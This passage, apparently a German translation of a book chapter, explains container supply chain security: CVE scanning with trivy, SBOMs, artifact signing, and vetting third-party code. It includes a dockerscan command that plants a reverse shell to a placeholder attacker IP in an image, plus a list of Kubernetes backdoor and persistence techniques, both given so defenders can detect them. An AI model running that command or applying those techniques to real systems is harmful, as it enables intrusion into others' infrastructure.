Software

Für unsere Zwecke sind die Lieferketten, die wir in Anspruch nehmen, für Software und Hardware. In einer Cloud-Umgebung werden die physische Sicherheit und die Netzwerksicherheit eines Rechenzentrums vom Anbieter verwaltet, aber es liegt in deiner Verantwortung, deine Nutzung des Systems zu sichern. Das bedeutet, dass wir darauf vertrauen können, dass die Hardware, die wir nutzen, sicher ist. Unser Umgang damit - die Software, die wir installieren, und ihr Verhalten - ist der Punkt, an dem das Risiko in der Lieferkette beginnt.

Software wird aus vielen anderen Teilen von Software zusammengesetzt. Im Gegensatz zur CPU-Fertigung, bei der träge Komponenten zu einer Struktur zusammengesetzt werden, ist Software eher eine symbiotische Population kooperierender Organismen. Jede Komponente kann autonom sein und sich für die Zusammenarbeit entscheiden (CLI-Tools, Server, Betriebssystem) oder nutzlos sein, wenn sie nicht auf eine bestimmte Art und Weise verwendet wird (glibc, verlinkte Bibliotheken, die meisten Anwendungsabhängigkeiten). Jede Software kann autonom oder kooperativ sein, und es ist unmöglich, eindeutig zu beweisen, was von beiden zu einem bestimmten Zeitpunkt zutrifft. Das bedeutet, dass Testcode (Unit-Tests, Akzeptanztests) immer noch bösartigen Code enthalten kann, der die Continuous Integration (CI)-Build-Umgebung oder den Rechner des Entwicklers, auf dem er ausgeführt wird, erforschen würde.

Das wirft ein Rätsel auf: Wenn bösartiger Code in jedem Teil eines Systems versteckt werden kann, wie können wir dann schlüssig sagen, dass das gesamte System sicher ist?

Wie Liz Rice in Container Security (O'Reilly) darlegt:

Es ist sehr wahrscheinlich, dass jede nicht-triviale Software einige Schwachstellen enthält, und es besteht das Risiko, dass Systeme über diese Schwachstellen angegriffen werden. Um dieses Risiko in den Griff zu bekommen, musst du in der Lage sein, die vorhandenen Schwachstellen zu erkennen und ihren Schweregrad einzuschätzen, sie nach Prioritäten zu ordnen und Prozesse zu entwickeln, um diese Probleme zu beheben oder zu entschärfen.

Das Management der Software-Lieferkette ist schwierig. Du musst ein gewisses Maß an Risiko in Kauf nehmen und sicherstellen, dass angemessene Maßnahmen ergriffen werden, um gefährliche Software zu erkennen, bevor sie in deinen Systemen ausgeführt wird. Diesem Risiko steht ein abnehmender Nutzen gegenüber - mit jeder Kontrolle wird es teurer und schwieriger, sie aufrechtzuerhalten, und jeder Schritt ist mit höheren Kosten verbunden.

Wie immer gehst du davon aus, dass keine Kontrolle vollkommen effektiv ist, und lässt Intrusion Detection auf den Build-Maschinen als letzte Verteidigungslinie gegen gezielte oder weit verbreiteteZero-Day-Schwachstellen laufen, zu denen SUNBURST, Shellshock oder DirtyCOW gehören könnten (siehe "Architektur von containerisierten Apps für Resilienz").

Jetzt wollen wir uns ansehen, wie wir eine Software-Lieferkette absichern können. Wir beginnen mit dem Minimum an praktikabler Cloud Native Security: dem Scannen nach CVEs.

Scannen nach CVEs

CVEs werden für bekannte Schwachstellen veröffentlicht, und es ist wichtig, dass du der grausamen Crew von Captain Hashjack keinen leichten Zugang zu deinen Systemen gewährst, indem du sie ignorierst oder fehlschlägst, um sie zu patchen. Open-Source-Software listet ihre Abhängigkeiten in den Build-Anweisungen auf(pom.xml, package.json, go.mod, requirements.txt, Gemfile usw.), was uns einen Einblick in ihre Zusammensetzung gibt. Das bedeutet, dass du diese Abhängigkeiten mit Tools wietrivy auf CVEs überprüfen solltest. Dies ist die am niedrigsten hängende Frucht bei der Verteidigung der Lieferkette und sollte als Teil der Mindestanforderungen an die Containersicherheit betrachtet werden.

trivy kann den Code im Ruhezustand an verschiedenen Stellen scannen:

• In einem Container-Image

• In einem Dateisystem

• In einem Git-Repository

Er berichtet über bekannte Schwachstellen. Das Scannen nach CVEs ist das Minimum an Sicherheit für die Auslieferung von Code an die Produktion.

Dieser Befehl durchsucht das lokale Verzeichnis und findet die Abhängigkeitsdateien gomod und npm und meldet deren Inhalt (die Ausgabe wurde entsprechend angepasst):

$ trivy fs . 
2021-02-22T10:11:32.657+0100    INFO    Detected OS: unknown
2021-02-22T10:11:32.657+0100    INFO    Number of PL dependency files: 2
2021-02-22T10:11:32.657+0100    INFO    Detecting gomod vulnerabilities...
2021-02-22T10:11:32.657+0100    INFO    Detecting npm vulnerabilities...

infra/build/go.sum
==================================
Total: 2 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 2, CRITICAL: 0) 

+-----------------------------+------------------+----------+-------------...
|           LIBRARY           | VULNERABILITY ID | SEVERITY |         INST...
+-----------------------------+------------------+----------+-------------...
| github.com/dgrijalva/jwt-go | CVE-2020-26160   | HIGH     | 3.2.0+incomp...
|                             |                  |          |             ...
|                             |                  |          |             ...
+-----------------------------+------------------+          +-------------...
| golang.org/x/crypto         | CVE-2020-29652   |          | 0.0.0-202006...
|                             |                  |          |             ...
|                             |                  |          |             ...
|                             |                  |          |             ...
+-----------------------------+------------------+----------+-------------...

infra/api/code/package-lock.json
==================================================
Total: 0 (UNKNOWN: 0, LOW: 0, MEDIUM: 0, HIGH: 0, CRITICAL: 0) 

Führe trivy gegen das Dateisystem (fs) im aktuellen Arbeitsverzeichnis (.) aus.

Die Überprüfung hat zwei hochgradig gefährliche Schwachstellen in infra/build/go.sum gefunden.

In der Datei infra/api/code/package-lock.json wurden keine Schwachstellen entdeckt.

Wir können also Code in unserer Lieferkette daraufhin überprüfen, ob er verwundbare Abhängigkeiten hat. Aber was ist mit dem Code selbst?

Übernahme von Open-Source-Software

Die sichere Aufnahme von Code ist schwierig: Wie können wir beweisen, dass ein Container-Image aus demselben Quellcode erstellt wurde, den wir auf GitHub sehen können? Oder dass eine kompilierte Anwendung derselbe Open-Source-Code ist, den wir gelesen haben, ohne ihn aus dem Quellcode nachzubauen?

Während dies bei Open Source schwierig ist, stellt Closed Source eine noch größere Herausforderung dar.

Wie schaffen und überprüfen wir das Vertrauen zu unseren Lieferanten?

Sehr zum Entsetzen des Kapitäns wird dieses Problem seit 1983 untersucht, als Ken Thompson "Reflections on Trusting Trust" vorstellte :

Inwieweit sollte man einer Aussage vertrauen, dass ein Programm frei von Trojanern ist? Vielleicht ist es wichtiger, den Menschen zu vertrauen, die die Software geschrieben haben.

Die Frage des Vertrauens liegt vielen menschlichen Interaktionen zugrunde und ist die Grundlage des ursprünglichen Internets. Thompson fährt fort:

Die Moral ist offensichtlich. Du kannst keinem Code vertrauen, den du nicht selbst erstellt hast. (Besonders Code von Unternehmen, die Leute wie mich beschäftigen.) Keine noch so gute Überprüfung auf Quellcode-Ebene wird dich davor schützen, nicht vertrauenswürdigen Code zu verwenden... Je niedriger die Programmstufe, desto schwieriger werden diese Fehler zu entdecken. Ein gut installierter Mikrocode-Fehler wird fast unmöglich zu entdecken sein.

Diese philosophischen Fragen der Sicherheit betreffen sowohl die Lieferkette deines Unternehmens als auch deine Kunden. Das Kernproblem bleibt ungelöst und lässt sich nur schwer vollständig beheben.

Während BCTLs traditionelle Beziehung zu Software früher als Konsument definiert wurde, bist du mit dem Start von öffentlichem Open Source auf GitHub auch zum Produzenten geworden. Diese Unterscheidung gibt es heute in den meisten Unternehmen, denn die meisten haben sich nicht an ihre neue Verantwortung als Produzent angepasst.

Architektur von containerisierten Apps für Resilienz

Du solltest eine gegnerische Denkweise annehmen, wenn du Systeme entwirfst und baust, damit Sicherheitsaspekte mit einbezogen werden. Zu dieser Denkweise gehört auch, dass du dich über historische Schwachstellen informierst, um dich gegen ähnliche Angriffe zu schützen.

Die granulare Sicherheitsrichtlinie eines Containers bietet die Möglichkeit, Anwendungen als "standardmäßig kompromittiert" zu betrachten und sie so zu konfigurieren, dass sie besser vor Zero-Day- oder ungepatchten Schwachstellen geschützt sind.

Trojaner aufspüren

Tools wie dockerscan können einen Container trojanisieren:

trojanisieren: eine Reverse Shell in ein Docker-Image einfügen

dockerscan

Ein webserver Bild zu trojanisieren ist einfach:

$ docker save nginx:latest -o webserver.tar 
$ dockerscan image modify trojanize webserver.tar \ 
  --listen "${ATTACKER_IP}" --port "${ATTACKER_PORT}" 
  --output trojanized-webserver 

Exportiere einen gültigen webserver tarball aus einem Container-Image.

Trojanisiere den Image-Tarball.

Gib die Shellcatcher-IP und den Port des Angreifers an.

Schreibe in einen Ausgabe-Tarball namens trojanized-webserver.

Genau diese Art von Angriffen solltest du in deinen Container-Images erkennen und verhindern. dockerscan verwendet einen LD_PRELOAD Angriff, den die meisten Container-IDS und Scans erkennen sollten.

Bei der dynamischen Analyse von Software wird diese in einer Malware-Laborumgebung ausgeführt, in der sie nicht mit dem Internet kommunizieren kann und auf Anzeichen von C2 ("Command and Control"), automatisierten Angriffen oder unerwartetem Verhalten beobachtet wird.

Ein Artefakt und sein Laufzeitverhalten sollten zusammen ein Bild von der Vertrauenswürdigkeit eines einzelnen Pakets ergeben, aber es gibt Umgehungsmöglichkeiten. Logikbomben (Verhalten, das nur unter bestimmten Bedingungen ausgeführt wird) erschweren die Erkennung, es sei denn, die Logik ist bekannt. SUNBURST hat zum Beispiel die gültigen HTTP-Aufrufe der infizierten Software genau nachgeahmt. Selbst die Nachverfolgung einer kompromittierten Anwendung mit Tools wie sysdig lässt diese Art von Angriffen nicht eindeutig erkennen.

Beharrlichkeit nach dem Kompromiss

Bevor Angreifer etwas tun, das vom Verteidiger entdeckt werden könnte, versuchen sie, eine Persistenz oder eine Hintertür einzurichten, damit sie z. B. in das System eindringen können, wenn sie entdeckt oder kurzerhand hinausgeworfen werden, weil ihre Eindringungsmethode gepatcht wurde.

Je nachdem, wie du kompromittiert wurdest, hat Captain Hashjack nun verschiedene Optionen zur Verfügung. Keine davon ist in einem gut konfigurierten Container ohne übermäßige RBAC-Privilegien möglich, was den Angreifer aber nicht davon abhält, denselben Weg erneut zu beschreiten und sich einen anderen Teil deines Systems vorzunehmen.

Mögliche Persistenz in Kubernetes kann erreicht werden durch:

• Starten eines statischen privilegierten Pods über die statischen Manifeste von kubelet

• Einen privilegierten Container direkt über die Container-Laufzeitumgebung bereitstellen

• Einsatz eines Admission Controllers oder CronJobs mit einer Backdoor

• Einsatz eines Schatten-API-Servers mit benutzerdefinierter Authentifizierung

• Hinzufügen eines mutierenden Webhooks, der einen Backdoor-Container in einige neue Pods injiziert

• Hinzufügen von Worker- oder Control-Plane-Knoten zu einem Botnet oder C2-Netzwerk

• Bearbeitung des Container-Lebenszyklus postStart und preStop hooks, um Backdoors hinzuzufügen

• Bearbeiten von Liveness Probes, um eine Backdoor im Zielcontainer auszuführen

• Jeder andere Mechanismus, der Code unter der Kontrolle des Angreifers ausführt

Risiken für deine Systeme

Sobald sie ausdauernd geworden sind, können die Angriffe mutiger undgefährlicher werden:

• Exfiltrieren von Daten, Anmeldeinformationen und Kryptowährungs-Geldbörsen

• Weiteres Eintauchen in das System über andere Pods, die Steuerungsebene, Worker Nodes oder das Cloud-Konto

• Kryptojacking von Rechenressourcen (z. B. Mining von Monero in Docker-Containern)

• Eskalierende Privilegien im selben Pod

• Kryptolocking-Daten

• Sekundärer Angriff in der Lieferkette auf die veröffentlichten Artefakte/Software des Ziels

Kommen wir nun zu den Container-Images .

Software-Fabriken

Eine Software Factory ist eine Form von CI/CD , die sich auf die Selbstreplikation konzentriert. Es handelt sich um ein Build-System, das Kopien von sich selbst oder von anderen Teilen des Systems als neue CI/CD-Pipelines bereitstellen kann. Dieser Fokus auf Replikation stellt sicher, dass Build-Systeme wiederholbar, einfach zu verteilen und leicht zu ersetzen sind. Außerdem unterstützen sie die Iteration und Entwicklung der Build-Infrastruktur selbst, was die Sicherung dieser Art von Systemen erheblich erleichtert.

Die Verwendung dieses Musters erfordert ausgefeilte DevOps-Fähigkeiten, kontinuierliche Integration und Build-Automatisierung und ist aufgrund der Kompartimentierung ideal für Container.

Das kryptografische Signieren von Build-Schritten und Artefakten kann das Vertrauen in das System erhöhen und kann mit einer Zulassungskontrolle wie portieris für Notary und Kritis für Grafeas revalidiert werden.

Tekton ist ein Kubernetes-basiertes Build-System, das Build-Schritte in Containern ausführt. Es führt Kubernetes Custom Resources aus, die Build-Schritte in Pods definieren, und Tekton Chains kann in-toto verwenden, um die Workspace-Dateien des Pods zu signieren. Jenkins X baut darauf auf und erweitert dessen Funktionsumfang.

Blessed Image Factory

Einige Software Factory-Pipelines werden verwendet, um Basisbilder zu erstellen und zu scannen, und zwar auf die gleiche Weise, wie die Bilder virtueller Maschinen erstellt werden: in einem bestimmten Rhythmus und als Reaktion auf die Veröffentlichung des zugrunde liegenden Bildes. Ein Image-Build ist nicht vertrauenswürdig, wenn eine der Eingaben des Builds nicht vertrauenswürdig ist. Ein Angreifer kann einen Container-Build mit angreifen:

• Bösartige Befehle in einer RUN Direktive, die den Host angreifen können

• Nicht-Loopback-Netzwerk-Ports/Dienste des Hosts

• Aufzählung anderer Netzwerkeinheiten (Cloud-Provider, Build-Infrastruktur, Netzwerkrouten zur Produktion)

• Bösartiges FROM Image, das Zugriff auf Build Secrets hat

• Bösartiges Bild mit der Richtlinie ONBUILD

• Docker-in-Docker und eingehängte Container-Laufzeit-Sockets, die zu einem Host-Breakout führen können

• Zero-Days in der Container-Laufzeit oder im Kernel

• Angriffsfläche im Netzwerk (Host, Ports, die von anderen Builds offengelegt werden)

Um dich vor bösartigen Builds zu schützen, solltest du mit statischer Analyse unter Verwendung von Hadolint und conftest beginnen, um deine Richtlinien durchzusetzen. Zum Beispiel :

$ docker run --rm -i hadolint/hadolint < Dockerfile
/dev/stdin:3 DL3008 Pin versions in apt get install.
/dev/stdin:5 DL3020 Use COPY instead of ADD for files and folders

Conftest umhüllt OPA und führt Richtlinien in der Rego-Sprache aus (siehe "Open Policy Agent"):

$ conftest test --policy ./test/policy --all-namespaces Dockerfile
2 tests, 2 passed, 0 warnings, 0 failures, 0 exceptions

Wenn die Dockerdatei den Richtlinien entspricht, scanne den Container-Build-Workspace mit Tools wie trivy. Du kannst auch erst bauen und dann scannen, obwohl dies etwas riskanter ist, wenn ein Angriff eine Reverse Shell in die Build-Umgebung einschleust.

Wenn der Scan des Containers sicher ist, kannst du einen Build durchführen.

Es ist wichtig, das Netzwerk des Builds zu schützen, da bösartiger Code in einem Container-Build sonst weitere Abhängigkeiten und bösartigen Code aus dem Internet ziehen kann. Sicherheit Kontrollen mit unterschiedlichem Schwierigkeitsgrad umfassen:

• Verhinderung des Netzwerkaustritts

• Isolierung vom Kernel des Hosts mit einer VM

• Den Build-Prozess als Nicht-Root-Benutzer oder in einem Benutzer-Namensraum ausführen

• Ausführen von RUN Befehlen als Nicht-Root-Benutzer im Container-Dateisystem

• Teile nichts Unwichtiges mit dem build

Basisbilder

Wenn eine Anwendung für den Einsatz verpackt wird, muss sie in ein Container-Image eingebaut werden. Abhängig von der gewählten Programmiersprache und den Abhängigkeiten der Anwendung verwendet dein Container eines der Basisbilder ausTabelle 4-3.

Minimalcontainer minimieren die Angriffsfläche eines Containers auf einen feindlichen Prozess oder RCE, wodurch ein Angreifer auf sehr fortgeschrittene Tricks wie die rückkehrorientierte Programmierung angewiesen ist, die meisten Angreifer nicht beherrschen. Organisierte Kriminelle wie Dread Pirate Hashjack sind zwar in der Lage, diese Programmiertechniken zu nutzen, aber die Ausnutzung solcher Schwachstellen ist sehr wertvoll und wird wahrscheinlich eher an einen Exploit-Broker verkauft als vor Ort eingesetzt, was ihren Wert im Falle einer Entdeckung verringern könnte.

Da statisch kompilierte Binärdateien ihre eigene Systemaufrufbibliothek mitliefern, benötigen sie weder glibc noch eine andere Userspace-Kernelschnittstelle und können nur mit sich selbst im Dateisystem existieren (siehe Abbildung 4-5).

Abbildung 4-5. Wie Scratch-Container und glibc mit dem Kernel kommunizieren

Lass uns jetzt einen Schritt zurückgehen: Wir müssen eine Bestandsaufnahme unserer Lieferkette machen.

Risiko durch Drittanbietercodes

Während der Erstellung des Images installiert deine Anwendung Abhängigkeiten in den Container, und dieselben Abhängigkeiten werden oft auch auf den Rechnern der Entwickler installiert. Dies erfordert die sichere Einbindung von Drittanbietern und Open Source Code.

Du legst Wert auf die Sicherheit deiner Daten, deshalb könnte es unsicher sein, Code aus dem Internet auszuführen, ohne ihn vorher zu überprüfen. Angreifer wie Captain Hashjack könnten eine Hintertür hinterlassen haben, um Fernzugriff auf jedes System zu ermöglichen, auf dem ihr bösartiger Code läuft. Du solltest das Risiko eines solchen Angriffs als ausreichend gering einschätzen, bevor du die Software im Unternehmensnetzwerk und auf den Produktionssystemen deines Unternehmens zulässt.

Eine Methode zum Scannen von eingelesenem Code ist in Abbildung 4-6 dargestellt. Container (und anderer Code), die von außerhalb deines Unternehmens stammen, werden aus dem Internet auf eine temporäre virtuelle Maschine gezogen. Alle Software-Signaturen und Prüfsummen werden überprüft, Binärdateien und Quellcode werden auf CVEs und Malware gescannt und das Artefakt wird verpackt und signiert, damit es in einer internen Registry verwendet werden kann.

Abbildung 4-6. Einbindung von Drittanbieter-Code

In diesem Beispiel wird ein Container aus einer öffentlichen Registry auf CVEs gescannt, z. B. mit einem Tag für die interne Domain versehen, dann mit Notary signiert und in eine interne Registry verschoben, wo er von Kubernetes-Build-Systemen und deinen Entwicklern genutzt werden kann.

Wenn du Code von Drittanbietern aufnimmst, solltest du darauf achten, wer ihn veröffentlicht und/oder das Paket signiert hat, welche Abhängigkeiten er selbst nutzt, wie lange er veröffentlicht wurde und wie er in deinen internen statischen Analysepipelines abschneidet.

Das Scannen des Codes von Drittanbietern, bevor er in dein Netzwerk gelangt, schützt dich vor einigen Kompromittierungen der Lieferkette, aber gezielte Angriffe können schwieriger abzuwehren sein, da sie möglicherweise keine bekannten CVEs oder Malware verwenden. In diesen Fällen solltest du den Code im Rahmen deiner Validierung beobachten.

Software-Stücklisten

Die Erstellung einer Software Bill of Materials (SBOM) für ein Container-Image ist mit Tools wiesyft, das unterstützt APK, DEB, RPM, Ruby Bundles, Python Wheel/Egg/requirements.txt, JavaScript NPM/Yarn, Java JAR/EAR/WAR, Jenkins plugi-ns JPI/HPI und Go-Module, ganz einfach.

Es kann Ausgaben im CycloneDX XM Format erzeugen. Hier läuft es in einem Container mit einer einzelnen statischen Binärdatei:

user@host:~ [0]$ syft packages controlplane/bizcard:latest -o cyclonedx
Loaded image
Parsed image
Cataloged packages      [0 packages]
<?xml version="1.0" encoding="UTF-8"?>
<bom xmlns="http://cyclonedx.org/schema/bom/1.2"
    version="1" serialNumber="urn:uuid:18263bb0-dd82-4527-979b-1d9b15fe4ea7">
  <metadata>
    <timestamp>2021-05-30T19:15:24+01:00</timestamp>
    <tools>
      <tool>
        <vendor>anchore</vendor>   
        <name>syft</name>          
        <version>0.16.1</version>  
      </tool>
    </tools>
    <component type="container">  
      <name>controlplane/bizcard:latest</name> 
      <version>sha256:183257b0183b8c6420f559eb5591885843d30b2</version> 
    </component>
  </metadata>
  <components></components>
</bom>

Der Hersteller des Tools, das zur Erstellung der SBOM verwendet wird.

Das Werkzeug, das die SBOM erstellt hat.

Die Werkzeugversion.

Die zu scannende Komponente der Lieferkette und ihre Art des Behälters.

Der Name des Containers.

Die Version des Containers, ein SHA256 Content Hash oder Digest.

Eine Stückliste ist einfach eine Packliste für deine Software-Artefakte. Wenn wir das alpine:base Image aufrufen, sehen wir eine SBOM mit Softwarelizenzen (die Ausgabe wurde entsprechend angepasst):

user@host:~ [0]$ syft packages alpine:latest -o cyclonedx
 ✔ Loaded image
 ✔ Parsed image
 ✔ Cataloged packages      [14 packages]
<?xml version="1.0" encoding="UTF-8"?>
<bom xmlns="http://cyclonedx.org/schema/bom/1.2"
     version="1" serialNumber="urn:uuid:086e1173-cfeb-4f30-8509-3ba8f8ad9b05">
  <metadata>
    <timestamp>2021-05-30T19:17:40+01:00</timestamp>
    <tools>
      <tool>
        <vendor>anchore</vendor>
        <name>syft</name>
        <version>0.16.1</version>
      </tool>
    </tools>
    <component type="container">
      <name>alpine:latest</name>
      <version>sha256:d96af464e487874bd504761be3f30a662bcc93be7f70bf</version>
    </component>
  </metadata>
  <components>
  ...
  <component type="library">
      <name>musl</name>
      <version>1.1.24-r9</version>
      <licenses>
        <license>
          <name>MIT</name>
        </license>
      </licenses>
      <purl>pkg:alpine/musl@1.1.24-r9?arch=x86_64</purl>
    </component>
  </components>
</bom>

Diese überprüfbaren Artefakte können von Sicherheitstools für die Lieferkette wie cosign, in-toto und notary signiert werden. Wenn die Verbraucher verlangen, dass die Lieferanten überprüfbare Artefakte und Stücklisten aus ihren eigenen geprüften, konformen und sicheren Softwarefabriken produzieren, wird die Lieferkette für gelegentliche Angreifer schwieriger zu kompromittieren sein.

Menschliche Identität und GPG

Das Signieren von Git-Commits mit GNU Privacy Guard (GPG)-Signaturen zeigt an, dass der Besitzer des Schlüssels dem Commit zum Zeitpunkt der Signatur vertraut hat. Dies ist nützlich, um das Vertrauen zu erhöhen, erfordert aber eine Public-Key-Infrastruktur (PKI), die notorisch schwer zu sichern ist.

Daten zu signieren ist einfach - die Überprüfung ist schwierig.

Dan Lorenc

Das Problem bei PKI ist das Risiko einer Verletzung der PKI-Infrastruktur. Irgendjemand ist immer dafür verantwortlich, dass die Public-Key-Infrastruktur (die Server, auf denen die vertrauenswürdigen öffentlichen Schlüssel der einzelnen Personen gespeichert sind) nicht kompromittiert wird und korrekte Daten meldet. Wenn die PKI kompromittiert wird, kann eine ganze Organisation ausgenutzt werden, indem Angreifer vertrauenswürdigen Nutzern Schlüssel hinzufügen, die sie kontrollieren.

sigstore

sigstore ist ein öffentlicher Software-Signierungs- und Transparenzdienst, der Container mit cosign signieren und die Signaturen in einem OCI-Repository speichern kann, was in Notary v1 fehlt. Da alles in einem Container gespeichert werden kann (z. B. Binärdateien, Tarballs, Skripte oder Konfigurationsdateien), ist cosign ein allgemeines Artefakt-Signierungswerkzeug mit OCI als Paketformat.

sigstore bietet kostenlose Zertifikate und Werkzeuge, um Signaturen von Quellcode zu automatisieren und zu überprüfen.

sigstore release ankündigung

Ähnlich wie Certificate Transparency verfügt es über ein kryptografisches Ereignisbuch ( rekor genannt) und jedes Ereignis enthält signierte Metadaten über eine Softwareversion, wie in Abbildung 4-7 dargestellt. Und schließlich unterstützt es "eine kostenlose Root-CA für Code Signing Certs, d. h. die Ausstellung von Zertifikaten auf der Grundlage einer OIDC-E-Mail-Adresse" in fulcio. Gemeinsam verbessern diese Tools die Möglichkeiten der Sicherheitslandschaft in der Lieferkette drastisch.

Es ist für Open-Source-Software konzipiert und wird schnell weiterentwickelt. Es gibt Integrationen für TUF und in-toto, hardwarebasierte Token werden unterstützt und es ist mit den meisten OCI-Registern kompatibel.

sigstorewird zum Signieren der Distroless-Basisbild-Familie verwendet.

Abbildung 4-7. Speichern von Sigstore-Manifesten im Rekor-Transparenzprotokoll

in-toto und TUF

Die in-toto Toolchain prüft Prüfsummen und signiert Software-Builds - die Schritte und Ergebnisse von CI/CD Pipelines. Dadurch werden transparente Metadaten über Software-Build-Prozesse bereitgestellt. Das erhöht das Vertrauen der Verbraucher, dass ein Artefakt aus einer bestimmten Quellcode-Revision erstellt wurde.

In-Toto-Link-Metadaten (die die Übergänge zwischen den Build-Phasen beschreiben und Metadaten über sie signieren) können von Tools wie Rekor und Grafeas gespeichert werden, um von den Verbrauchern zum Zeitpunkt der Nutzung validiert zu werden.

Die In-Toto-Signatur stellt sicher, dass eine vertrauenswürdige Partei (z. B. der Build-Server) diese Objekte erstellt und signiert hat. Es gibt jedoch keine Garantie dafür, dass die Schlüssel der Drittpartei nicht kompromittiert wurden - die einzige Lösung dafür ist, parallele, isolierte Build-Umgebungen zu betreiben und die kryptografischen Signaturen zu überprüfen. Dies geschieht mit reproduzierbaren Builds (in Debian, Arch Linux und PyPi), um gegen die Kompromittierung von Build-Tools gewappnet zu sein.

Dies ist nur möglich, wenn das CI und die Builds selbst deterministisch (keine Nebeneffekte des Builds) und reproduzierbar sind (dieselben Artefakte werden durch den Quellcode erzeugt). Wenn du dich auf zeitliches oder stochastisches Verhalten (Zeit und Zufall) verlässt, entstehen nicht reproduzierbare Binärdateien, da sie von Zeitstempeln in Logdateien oder zufälligen Seeds beeinflusst werden, die die Kompilierung beeinflussen.

Durch den Einsatz von in-toto erhöht ein Unternehmen das Vertrauen in seine Pipelines und Artefakte, da es für alles verifizierbare Signaturen gibt. Ohne ein objektives Bedrohungsmodell oder eine Sicherheitsbewertung der ursprünglichen Build-Infrastruktur bietet dies jedoch keinen Schutz für Lieferketten mit einem einzigen Build-Server, der möglicherweise kompromittiert wurde.

Produzenten, die in-toto mit Konsumenten arbeiten, die Signaturen verfälschen, machen Angreifern das Leben schwer. Sie müssen die Signierinfrastruktur vollständig kompromittieren (wie bei SolarWinds).

GCP Binäre Autorisierung

Die Funktion GCP Binary Authorization ermöglicht das Signieren von Images und die Zugangskontrolle, um zu verhindern, dass unsignierte, veraltete oder anfällige Images in die Produktion gelangen.

Die Überprüfung der erwarteten Signaturen zur Laufzeit ermöglicht die Durchsetzung der Pipeline-Kontrollen: Ist dieses Image frei von bekannten Schwachstellen oder hat es eine Liste "akzeptierter" Schwachstellen? Hat es die automatischen Akzeptanztests in der Pipeline bestanden? Stammt es überhaupt aus der Build-Pipeline?

Grafeas wird verwendet, um Metadaten von Bildscan-Berichten zu speichern, und Kritis ist eine Zulassungskontrolle, die Signaturen und das Fehlen von CVEs anhand der Bilder überprüft.

Grafeas

Grafeas ist ein Metadatenspeicher für Pipeline-Metadaten wie Schwachstellenscans und Testberichte. Die Informationen über einen Container werden anhand seines Digests aufgezeichnet, der verwendet werden kann, um über Schwachstellen der Images einer Organisation zu berichten und sicherzustellen, dass die Build-Phasen erfolgreich durchlaufen wurden. Grafeas kann auch In-To-Link-Metadaten speichern.

Operator Privilegien

Kubernetes-Operatoren sollen menschliche Fehler reduzieren, indem sie die Kubernetes-Konfiguration automatisieren und auf Ereignisse reagieren. Sie interagieren mit Kubernetes und allen anderen Ressourcen, die unter der Kontrolle des Operators stehen. Diese Ressourcen können sich in einem einzigen Namensraum, in mehreren Namensräumen oder außerhalb von Kubernetes befinden. Das bedeutet, dass sie oft sehr privilegiert sind, um diese komplexe Automatisierung zu ermöglichen, und daher ein gewisses Risiko mit sich bringen.

Ein Operator-basierter Angriff auf die Lieferkette könnte es Captain Hashjack ermöglichen, seine bösartigen Workloads diskret einzusetzen, indem er RBAC missbraucht, und eine abtrünnige Ressource könnte völlig unentdeckt bleiben. Obwohl dieser Angriff noch nicht weit verbreitet ist, hat er das Potenzial, eine große Anzahl von Clustern zu kompromittieren.

Du musst die Operatoren von Drittanbietern bewerten und auf ihre Sicherheit prüfen, bevor du ihnen vertraust: Schreibe Tests für ihre RBAC-Berechtigungen, damit du bei Änderungen gewarnt wirst, und stelle sicher, dass die Konfiguration eines Operators securityContext für die Arbeitslast geeignet ist.

Angriffe auf höhere Ebenen der Lieferkette

Um BCTL anzugreifen, kann Captain Hashjack in Erwägung ziehen, die Organisationen anzugreifen, die seine Software bereitstellen, wie z. B. Betriebssysteme, Anbieter und Open-Source-Pakete. Deine Open-Source-Bibliotheken können ebenfalls Schwachstellen aufweisen. Die verheerendste davon war in der Vergangenheit ein Apache Struts RCE, CVE-2017-5638.

Vertrauenswürdige Open-Source-Bibliotheken können "backdoored" worden sein (z. B. dasNPM-Paketevent-stream ) oder aus der Registrierung entfernt worden sein, während sie aktiv genutzt wurden, wie z. B. left-pad (obwohl die Registrierungsstellen jetzt versuchen, dies zu vermeiden, indem sie das "Unpublishing" von Paketen verhindern).

Code, der von Anbietern verteilt wird, kann kompromittiert werden, wie esbei Codecov der Fall war. Ein Fehler im Prozess zur Erstellung von Container-Images ermöglichte es einem Angreifer, ein Bash-Uploader-Skript zu verändern, das von Kunden ausgeführt wird, um Builds zu starten. Dieser Angriff kompromittierte Build Secrets, die dann gegen andere Systeme verwendet werden konnten.

Schlecht geschriebener Code, der bei nicht vertrauenswürdigen Benutzereingaben oder internen Fehlern fehlschlägt, kann aus der Ferne ausnutzbare Schwachstellen aufweisen. Die Anwendungssicherheit ist dafür verantwortlich, diesen einfachen Zugang zu deinen Systemen zu verhindern.

Die branchenweit anerkannte Bezeichnung für diese ist "shift left", was bedeutet, dass du den von deinen Entwicklern geschriebenen Code statisch und dynamisch analysieren solltest, während sie ihn schreiben: Füge der IDE automatisierte Werkzeuge hinzu, biete einen lokalen Sicherheitstest-Workflow an, führe Konfigurationstests vor der Bereitstellung durch und überlasse Sicherheitsüberlegungen im Allgemeinen nicht dem letztmöglichen Moment, wie es bei Software üblich ist.

Open Source Ingestion

Diese Detailgenauigkeit kann anstrengend werden, wenn sie auf jedes einzelne Paket angewendet wird, und wird im großen Maßstab schnell unpraktisch. Ein Netz des Vertrauens zwischen Herstellern und Verbrauchern kann die Last der doppelten Überprüfung der Beweise in jedem Glied der Kette etwas verringern. Allerdings kann nichts vollständig vertrauenswürdig sein, und eine regelmäßige Überprüfung des Codes ist notwendig, um neu bekannt gewordene CVEs oder Zero-Days zu berücksichtigen.

In "Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages" (Zur Messung von Angriffen auf Paketmanager für interpretierte Sprachen) identifizieren die Autoren die in Tabelle 4-5 aufgelisteten relevanten Probleme.

Das Papier fasst zusammen, dass:

• Typosquatting und Account-Kompromittierung sind für Angreifer kostengünstig und die am häufigsten genutzten Angriffsvektoren.

• Das Stehlen von Daten und das Einschleusen von Hintertüren sind die häufigsten böswilligen Verhaltensweisen nach einem Exploit, was darauf hindeutet, dass viele Verbraucher betroffen sind.

• 20 % der identifizierten Schadprogramme haben sich in den Paketmanagern mehr als 400 Tage lang gehalten und mehr als 1.000 Downloads verzeichnet.

• Zu den neuen Techniken gehören Codeverschleierung, mehrstufige Nutzlasten und Logikbomben, um die Entdeckung zu umgehen.

